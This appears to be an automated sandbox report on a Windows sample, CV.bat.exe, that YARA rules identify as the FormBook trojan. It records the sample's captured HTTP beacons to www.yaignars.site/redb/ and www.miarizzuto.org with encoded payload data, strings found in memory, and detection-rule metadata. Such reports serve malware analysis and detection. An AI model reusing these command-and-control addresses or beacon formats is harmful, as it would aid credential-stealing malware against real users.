Source: global traffic	HTTP traffic detected: POST /redb/ HTTP/1.1Host: www.yaignars.siteConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.yaignars.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.yaignars.site/redb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 36 38 54 37 54 54 62 45 6a 41 32 41 62 32 33 4e 6c 6e 67 68 68 73 62 69 56 66 66 51 64 72 4a 4d 55 68 46 56 41 64 46 5f 64 6c 61 42 6e 76 41 5a 67 75 66 45 53 2d 42 51 70 39 66 6f 74 41 55 67 55 66 32 66 43 56 62 62 76 2d 70 77 30 78 73 55 7a 4e 33 4f 52 47 35 46 69 7a 38 74 65 68 55 51 69 48 66 33 39 44 31 49 67 39 67 58 33 44 74 34 64 54 32 75 4e 4b 7a 77 49 35 54 61 71 69 58 4c 38 76 75 6f 63 72 38 30 31 76 6a 79 37 6f 55 72 68 4e 32 57 78 4b 66 30 59 7a 6b 47 44 39 67 71 71 5f 44 77 46 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W68T7TTbEjA2Ab23NlnghhsbiVffQdrJMUhFVAdF_dlaBnvAZgufES-BQp9fotAUgUf2fCVbbv-pw0xsUzN3ORG5Fiz8tehUQiHf39D1Ig9gX3Dt4dT2uNKzwI5TaqiXL8vuocr801vjy7oUrhN2WxKf0YzkGD9gqq_DwFA).
Source: global traffic	HTTP traffic detected: POST /redb/ HTTP/1.1Host: www.yaignars.siteConnection: closeContent-Length: 5334Cache-Control: no-cacheOrigin: http://www.yaignars.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.yaignars.site/redb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 63 6a 37 57 77 7a 45 6d 67 33 79 65 32 33 4e 28 58 67 74 68 73 58 69 56 63 54 41 64 65 52 4d 56 32 4a 56 41 5f 64 5f 66 6c 61 42 32 66 41 6a 74 4f 66 57 53 2d 56 6d 70 38 75 54 74 43 34 67 56 4e 7e 66 55 6c 62 61 67 2d 6f 58 31 78 73 54 73 64 33 4f 52 48 46 7a 69 33 6f 58 65 68 63 51 69 55 48 33 39 42 64 4c 68 74 67 53 34 6a 74 34 64 53 4b 68 4e 4b 7a 4b 49 35 37 4b 71 68 66 4c 7e 38 32 6f 65 36 38 31 38 66 6a 78 34 6f 55 34 74 6f 66 42 33 36 32 48 66 78 59 6c 55 61 6c 42 69 4d 62 36 5a 62 56 6c 6b 4c 47 31 59 38 61 56 33 42 66 47 6e 59 4a 73 34 52 62 57 6e 69 4a 31 44 74 34 4f 6d 61 41 32 71 6c 50 6d 79 57 42 74 45 65 79 67 6b 59 4a 6d 71 70 6c 66 55 51 55 30 49 5f 41 77 78 75 5a 41 76 59 61 36 65 76 62 31 64 46 49 65 50 33 63 6a 70 47 32 2d 31 30 76 53 33 2d 77 55 45 54 55 51 44 5f 68 57 55 65 79 49 45 56 53 79 38 76 4c 48 68 30 59 72 71 43 51 33 61 46 65 4a 4c 78 4f 78 4a 4a 38 64 57 78 65 57 37 37 39 55 65 63 58 68 4a 74 57 54 71 76 38 65 78 32 64 72 4b 63 44 2d 4e 66 6a 64 4c 78 51 35 67 73 6c 4b 58 69 31 4f 58 4b 51 53 6c 69 68 71 57 66 7a 76 4e 74 6f 51 6f 36 44 6c 43 51 41 6d 53 54 44 4b 68 43 4e 57 30 38 35 36 32 74 7e 54 55 57 42 6b 54 57 57 67 46 33 63 2d 47 4f 78 69 65 34 69 79 45 70 66 79 5a 64 38 64 39 31 69 63 65 63 33 4b 6c 42 74 4f 30 6d 32 66 31 42 68 56 6a 75 6e 71 58 67 31 2d 31 47 4c 35 65 30 6b 73 50 39 32 61 6c 69 69 36 4e 7a 42 6c 37 43 39 65 6c 4a 28 69 53 4b 68 4d 64 73 62 69 57 5a 75 4f 70 54 4c 4b 57 36 77 43 37 43 4d 4a 52 6c 69 64 7e 50 73 59 75 67 35 30 70 67 4e 35 34 52 5a 35 46 77 65 63 6c 4e 36 33 31 79 4d 6f 72 79 41 48 36 37 75 2d 6e 6c 38 41 78 51 34 38 31 61 56 61 68 47 71 53 6a 34 57 67 69 50 5a 66 74 74 55 6f 47 66 6f 4c 67 76 30 69 68 6b 57 51 4e 75 54 54 48 41 39 44 51 4f 59 37 32 73 6d 4e 74 61 68 35 39 45 70 48 7e 72 43 48 50 75 30 66 76 73 7e 69 61 43 30 32 62 6d 4f 78 31 43 69 47 61 4a 73 6c 6b 66 65 67 58 67 34 32 52 56 67 68 63 55 57 61 61 54 6f 54 52 55 37 64 58 77 47 37 50 32 76 75 4f 7a 58 57 37 6c 6e 66 4e 71 33 54 77 52 6b 56 65 41 47 2d 50 46 61 6b 6f 56 78 61 58 48 33 66 33 69 52 70 7e 77 4d 55 4e 32 4b 41 67 41 58 46 41 55 31 42 62 72 6b 76 4c 7a 63 52 55 38 67 55 7a 72 43 32 7a 70 77 37 6e 48 6e 73 67 67 73 58 6b 35 77 4c 4a 70 6d 50 32 53 64 33 5a 74 58 7a 4a 6e 52 78 34 55 70 4f 71 54 6d 74 64 6e 57 69 52 7a 4a 58 35 70 73 67 75 38 68 7a 62 71 6c 63 70 69 67 37 56 54 49 6e 6a 56 6f 69 66 59 66 46 67 52 37 61 31 71 63 2d 61 31 63 46 76 50 44 69 37 56 36 34 50 68 45 55 59 61 6c 46 72 37 6b 53 52 56 77 78 33 38 79 53 41 74 59 30 67 4b 79 4c 6

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 03 Oct 2022 13:57:25 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 03 Oct 2022 13:57:28 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 03 Oct 2022 13:57:30 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0

Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://img.sedoparking.com
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chkdsk.exe, 00000011.00000002.534712310.0000000005F06000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://survey-smiles.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000000.00000002.302134745.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: CV.bat.exe, 00000000.00000002.302134745.0000000000EE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comgrito
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: CV.bat.exe, 00000000.00000002.312144688.00000000069D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: f-0386u9.17.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: f-0386u9.17.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: f-0386u9.17.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: f-0386u9.17.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: f-0386u9.17.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: f-0386u9.17.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: chkdsk.exe, 00000011.00000002.529818531.000000000547C000.00000004.00000020.00020000.00000000.sdmp, f-0386u9.17.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.name.com/domain/renew/yaignars.site?utm_source=Sedo_parked_page&utm_medium=button&utm_ca
Source: chkdsk.exe, 00000011.00000002.534772213.000000000622A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: unknown

HTTP traffic detected: POST /redb/ HTTP/1.1Host: www.yaignars.siteConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.yaignars.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yaignars.site/redb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 50 4c 37 55 67 7a 45 72 67 32 41 54 57 33 4c 6c 6e 67 71 68 73 62 6d 56 63 54 41 64 63 31 4d 56 77 31 56 41 50 64 5f 65 6c 61 43 6f 50 41 6a 74 4f 66 56 53 2d 42 32 70 39 54 6f 74 41 41 67 55 65 6d 66 43 48 7a 61 75 2d 6f 57 6e 42 73 54 69 39 33 62 52 47 30 47 69 32 45 74 65 6a 63 51 69 55 6e 33 7e 52 64 4c 72 39 67 53 30 44 74 7a 57 7a 32 69 4e 4b 7a 65 49 35 54 77 71 67 76 4c 28 66 7e 6f 54 70 55 31 6d 50 6a 7a 34 6f 56 33 77 34 62 4f 33 36 37 47 66 78 74 2d 55 63 68 42 69 73 62 36 59 65 68 6c 72 72 47 30 56 73 61 57 33 41 6a 34 6e 59 52 73 34 51 76 5a 6d 54 52 31 43 4e 6f 4f 6c 35 6f 31 28 6c 50 61 35 32 41 31 57 65 75 5f 6b 59 5a 69 71 6f 39 66 55 6b 4d 30 4a 4f 41 77 79 4d 42 41 72 34 61 2d 65 76 62 45 51 6c 45 48 50 33 42 77 70 43 71 2d 31 44 50 53 32 73 6f 55 46 43 55 51 57 66 68 58 54 65 79 4e 45 56 53 51 38 76 28 48 68 30 45 52 71 41 30 33 64 55 75 4a 63 78 4f 77 42 4a 38 61 49 68 65 36 28 37 38 6c 65 66 37 62 4a 74 48 75 72 66 67 65 79 78 78 72 4b 4c 33 2d 41 76 6a 63 4f 78 51 34 67 73 70 6c 58 69 5a 6f 58 4f 45 53 6b 53 5a 71 57 65 44 76 41 61 38 51 6e 61 44 6b 49 77 42 48 55 7a 79 68 76 7a 42 49 37 65 56 6f 33 4b 69 48 64 6b 41 4e 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W7PL7UgzErg2ATW3LlngqhsbmVcTAdc1MVw1VAPd_elaCoPAjtOfVS-B2p9TotAAgUemfCHzau-oWnBsTi93bRG0Gi2EtejcQiUn3~RdLr9gS0DtzWz2iNKzeI5TwqgvL(f~oTpU1mPjz4oV3w4bO367Gfxt-UchBisb6YehlrrG0VsaW3Aj4nYRs4QvZmTR1CNoOl5o1(lPa52A1Weu_kYZiqo9fUkM0JOAwyMBAr4a-evbEQlEHP3BwpCq-1DPS2soUFCUQWfhXTeyNEVSQ8v(Hh0ERqA03dUuJcxOwBJ8aIhe6(78lef7bJtHurfgeyxxrKL3-AvjcOxQ4gsplXiZoXOESkSZqWeDvAa8QnaDkIwBHUzyhvzBI7eVo3KiHdkANRg).

Source: unknown

DNS traffic detected: queries for: www.miarizzuto.org

Source: global traffic	HTTP traffic detected: GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A== HTTP/1.1Host: www.miarizzuto.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ== HTTP/1.1Host: www.yaignars.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.418181649.0000000000DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: CV.bat.exe PID: 5060, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: chkdsk.exe PID: 1264, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: CV.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.418181649.0000000000DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
